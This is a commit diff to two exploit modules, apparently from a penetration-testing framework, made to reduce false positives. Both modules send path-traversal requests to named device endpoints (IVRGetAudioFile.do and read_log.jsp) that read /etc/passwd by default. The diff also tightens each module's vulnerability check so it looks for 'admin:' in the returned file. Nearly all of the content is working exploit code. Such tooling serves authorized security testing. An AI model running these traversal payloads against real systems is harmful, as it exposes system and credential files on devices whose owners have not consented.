Commit b9c67c24 by Marcin Bury

Fixing false positives.

parent 3b71264e
......@@ -44,6 +44,7 @@ class Exploit(exploits.Exploit):
filename = exploits.Option('/etc/passwd', 'File to read from the filesystem')
def run(self):
if self.check():
url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename)
response = http_request(method="GET", url=url)
......@@ -55,6 +56,8 @@ class Exploit(exploits.Exploit):
print_info(response.text)
else:
print_error("Exploit failed - could not read file")
else:
print_error("Exploit failed - target seems to be not vulnerable")
@mute
def check(self):
......@@ -64,7 +67,7 @@ class Exploit(exploits.Exploit):
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and len(response.text):
if response.status_code == 200 and "admin:" in response.text:
return True # target is vulnerable
return False # target is not vulnerable
......@@ -36,6 +36,7 @@ class Exploit(exploits.Exploit):
filename = exploits.Option('/etc/passwd', 'File to read from the filesystem')
def run(self):
if self.check():
url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(self.target, self.port, self.filename)
response = http_request(method="GET", url=url)
......@@ -48,6 +49,8 @@ class Exploit(exploits.Exploit):
print_info(response.text)
else:
print_error("Exploit failed - could not read file")
else:
print_error("Exploit failed - device seems to be not vulnerable")
@mute
def check(self):
......@@ -57,7 +60,7 @@ class Exploit(exploits.Exploit):
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and len(response.text):
if response.status_code == 200 and "admin:" in response.text:
return True # target is vulnerable
return False # target is not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment